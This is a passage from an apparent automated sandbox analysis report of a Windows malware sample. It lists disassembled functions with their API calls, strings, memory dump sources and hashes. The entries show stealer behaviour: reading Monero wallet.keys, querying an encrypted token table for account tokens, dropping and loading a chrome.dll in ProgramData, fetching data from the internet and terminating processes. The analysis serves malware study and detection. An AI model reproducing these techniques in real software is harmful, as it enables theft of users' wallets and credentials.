                                        • CatchIt.LIBVCRUNTIME ref: 009F03AC
                                        • CallUnexpected.LIBVCRUNTIME ref: 009F04C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 2356445960-393685449
                                        • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction ID: 321768decaee139e0ef655438d7d4ef567bc1494db47abbe1ebe70d53a26f7f4
                                        • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction Fuzzy Hash: 72B16A7180020DDFCF15DFA4C881ABEBBBDBF84314B14416AEA156B262E770DA51CBA1
                                        Function 0097BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                        • lstrlen.KERNEL32(00000000), ref: 0097BC6F
                                          • Part of subcall function 00988FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00988FE2
                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0097BC9D
                                        • lstrlen.KERNEL32(00000000), ref: 0097BD75
                                        • lstrlen.KERNEL32(00000000), ref: 0097BD89
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                        • API String ID: 3073930149-1079375795
                                        • Opcode ID: 40ba65445008513fbf4255b6e7610d19e65961f5b7071785427a62925ddf22a0
                                        • Instruction ID: 63c6f44424fe9953d14ae992aaaf72b3661373a1fdcb398cd72df8ed4be30104
                                        • Opcode Fuzzy Hash: 40ba65445008513fbf4255b6e7610d19e65961f5b7071785427a62925ddf22a0
                                        • Instruction Fuzzy Hash: 9AB111729101089BDF14FBA4DDA6FEE7379BF94300F40456AF50676291EF386A48CB62
                                        Function 00986A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess$DefaultLangUser
                                        • String ID: *
                                        • API String ID: 1494266314-163128923
                                        • Opcode ID: 3ee9d864a1ddb7443d2945e45de231f26fce92ae2d0fe26947a84f30711441bc
                                        • Instruction ID: d1de82176c7e5501bfa7a9a1abbe46620c7e2bd6265dee02a623ed5914938680
                                        • Opcode Fuzzy Hash: 3ee9d864a1ddb7443d2945e45de231f26fce92ae2d0fe26947a84f30711441bc
                                        • Instruction Fuzzy Hash: 5BF08234A0C209EFD744AFE0EC0975CBB30FB06707F114295F61E9A290C7704A40DB51
                                        Function 009808A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 00989850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,009808DC,C:\ProgramData\chrome.dll), ref: 00989871
                                          • Part of subcall function 0097A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0097A098
                                        • StrCmpCA.SHLWAPI(00000000,01818BD8), ref: 00980922
                                        • StrCmpCA.SHLWAPI(00000000,01818BF8), ref: 00980B79
                                        • StrCmpCA.SHLWAPI(00000000,01818C38), ref: 00980A0C
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                        • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00980C35
                                        Strings
                                        • C:\ProgramData\chrome.dll, xrefs: 00980C30
                                        • C:\ProgramData\chrome.dll, xrefs: 009808CD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                        • API String ID: 585553867-663540502
                                        • Opcode ID: b7daac8f709b410fefab0801365483035d0506dd51b7cfd13b5c17c129fb93bb
                                        • Instruction ID: f5abf5bc4b6f2757ff2acd1e264e7f214be2e5084a5e55cc9a46cbb9fd0fb2bc
                                        • Opcode Fuzzy Hash: b7daac8f709b410fefab0801365483035d0506dd51b7cfd13b5c17c129fb93bb
                                        • Instruction Fuzzy Hash: 6DA134717002099FCB28FF64D996BAD777ABFD5300F108569E80A9F351DA349A09CB92
                                        Function 009EF9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                        Download Yara Rule
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 009EFA1F
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 009EFA27
                                        • _ValidateLocalCookies.LIBCMT ref: 009EFAB0
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 009EFADB
                                        • _ValidateLocalCookies.LIBCMT ref: 009EFB30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction ID: 371e2ba578dfd62c8d5108b0989bd658a366a84b5073ac092648e629cd1b610e
                                        • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction Fuzzy Hash: 0041B235900248EBCF11DF69C890AAE7BA9FF89314F148166E91CAB392D7319E01CB91
                                        Function 00975000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0097501A
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00975021
                                        • InternetOpenA.WININET(00990DE3,00000000,00000000,00000000,00000000), ref: 0097503A
                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00975061
                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00975091
                                        • InternetCloseHandle.WININET(?), ref: 00975109
                                        • InternetCloseHandle.WININET(?), ref: 00975116
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                        • String ID:
                                        • API String ID: 3066467675-0
                                        • Opcode ID: 664d49208b969f96f0dbaf6851f32254545a2942d7f5b4a6bb90f63d83b0b64e
                                        • Instruction ID: 3d4c022d2a5b4d61257b9b0ade9d299e3e7bbf0e7036366a19bdd020ef84361c
                                        • Opcode Fuzzy Hash: 664d49208b969f96f0dbaf6851f32254545a2942d7f5b4a6bb90f63d83b0b64e
                                        • Instruction Fuzzy Hash: 303105B5A44218ABDB20DF54DC85BDCB7B4BB48304F1085D9FA09A7281DBB46EC58F98
                                        Function 0098856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 009885B6
                                        • wsprintfA.USER32 ref: 009885E9
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0098860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0098861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00988629
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                        • RegQueryValueExA.ADVAPI32(00000000,0181F5C0,00000000,000F003F,?,00000400), ref: 0098867C
                                        • lstrlen.KERNEL32(?), ref: 00988691
                                        • RegQueryValueExA.ADVAPI32(00000000,0181F5A8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00990B3C), ref: 00988729
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00988798
                                        • RegCloseKey.ADVAPI32(00000000), ref: 009887AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 3896182533-4073750446
                                        • Opcode ID: 5bcbd2f1f2f0cd045b738442e45a80d5ff5703ec862cc82fb6824a3c0c693189
                                        • Instruction ID: e8e16c666f135e4faad97ddfdd6abaf5f5ca273dd53b5439c9aec2ec68bae02f
                                        • Opcode Fuzzy Hash: 5bcbd2f1f2f0cd045b738442e45a80d5ff5703ec862cc82fb6824a3c0c693189
                                        • Instruction Fuzzy Hash: 2D212A75A1021CABDB24DB54DC85FE9B3B8FB48704F0085D9E609A6280DF746A85CFE4
                                        Function 009899A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009899C5
                                        • Process32First.KERNEL32(0097A056,00000128), ref: 009899D9
                                        • Process32Next.KERNEL32(0097A056,00000128), ref: 009899F2
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00989A4E
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00989A6C
                                        • CloseHandle.KERNEL32(00000000), ref: 00989A79
                                        • CloseHandle.KERNEL32(0097A056), ref: 00989A88
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        • Opcode ID: ddc58485e4baa2890d501504b47c9c910b6a68e98c22f92cc37608bb4ed0d84d
                                        • Instruction ID: 72b5ffa6696e6b874a23778695a908a932e985782418941fdb2b5ee10c989291
                                        • Opcode Fuzzy Hash: ddc58485e4baa2890d501504b47c9c910b6a68e98c22f92cc37608bb4ed0d84d
                                        • Instruction Fuzzy Hash: AE21FC75904218EBDB25EFA1DC88BEDB7B9BB49300F1446C8E50AA7290D7749E84CF90
                                        Function 00987820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987834
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0098783B
                                        • RegOpenKeyExA.ADVAPI32(80000002,0180BA00,00000000,00020119,00000000), ref: 0098786D
                                        • RegQueryValueExA.ADVAPI32(00000000,0181F4A0,00000000,00000000,?,000000FF), ref: 0098788E
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00987898
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: Windows 11
                                        • API String ID: 3225020163-2517555085
                                        • Opcode ID: c2e1bdcb7034bec1923b50e84f6d5f94ec18fd934e579ed9ac3194bc10e14849
                                        • Instruction ID: 9cf5002ae740715c61949dec7ff422ab52a3635b0696e99afc014d7bc382ab23
                                        • Opcode Fuzzy Hash: c2e1bdcb7034bec1923b50e84f6d5f94ec18fd934e579ed9ac3194bc10e14849
                                        • Instruction Fuzzy Hash: 68012C79A08304FBEB10EBE4DD89F6EB7B8BB49700F104198FA05A7290D7B099008B91
                                        Function 009878B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009878C4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009878CB
                                        • RegOpenKeyExA.ADVAPI32(80000002,0180BA00,00000000,00020119,00987849), ref: 009878EB
                                        • RegQueryValueExA.ADVAPI32(00987849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0098790A
                                        • RegCloseKey.ADVAPI32(00987849), ref: 00987914
                                        Strings
                                        Memory Dump Source
